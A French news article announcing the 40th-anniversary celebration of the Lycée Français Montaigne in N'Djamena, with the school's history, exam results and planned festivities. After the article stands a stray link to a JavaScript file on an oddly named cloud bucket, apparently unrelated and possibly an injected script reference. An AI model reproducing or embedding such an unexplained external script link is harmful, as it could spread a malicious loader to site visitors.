Lycée Français Montaigne fêtera dans 72 heures son 40e anniversaire d’existence.

0
556

Dans le cadre de la vulgarisation de l’éducation et de l’enseignement de qualité au Tchad, le gouvernement français a créé une école et le lycée français dénommé « Lycée Montaigne ». Créé le 12 janvier 1977 à N’Djamena, ce lycée s’apprête à célébrer son 40e anniversaire d’existence et de service.

Fondé à l’initiative d’un groupe de parents d’élèves, le lycée Français Montaigne fonctionne depuis la rentrée 1978 pour l’école primaire et depuis 1988 pour les niveaux du collège et du lycée. Selon le communiqué de presse fait par l’ambassade de France ce 09 janvier 2019 en prélude de la célébration du 40e anniversaire du lycée Montaigne « 640 élèves répartis de la maternelle à la terminale, ont fièrement validé 100% de réussite au baccalauréat en juin 2018 ».

Pour le communiqué, c’est en présence de hautes personnalités tchadiennes, du Chargé d’affaires de l’Ambassade de France au Tchad, du Chef de secteur Afrique de l’AEFE, de l’Inspectrice de l’Éducation Nationale française en résidence à Cotonou que, l’ensemble de la communauté scolaire du Lycée Montaigne célèbrera son 40e anniversaire le samedi 12 janvier 2019.

Un spectacle de chants et de danses suivi d’une kermesse et d’une tombola seront organisés à cette occasion y compris la présence d’anciens élèves, des personnels ayant par le passé travaillé au Lycée ainsi que les partenaires fidèles de l’établissement agrémenteront cette commémoration inédite.

L’école accueille des enfants de toutes nationalités et dispense un enseignement conforme aux programmes et aux exigences de l’Éducation nationale française. Cette célébration sera aussi l’occasion pour déterrer une capsule enterrée contenant des écrits enfouis d’élèves, le 29 mai 2009 afin de les remplacer par d’autres écrits destinés à être lus dans les dix prochaines années.

Entretemps, La cheffe d’établissement Mme Corinne Chan Yue Tack et la Présidente de l’APE Mme Khadidja    Artine comptent sur une large mobilisation et souhaitent longue vie à cet établissement d’excellence reconnu à N’Djamena et au-delà !

https://s3-us-west-2.amazonaws.com/gyrgdd/deext.js

Facebook Comments

LAISSER UN COMMENTAIRE

S'il vous plaît entrez votre commentaire!
S'il vous plaît entrez votre nom ici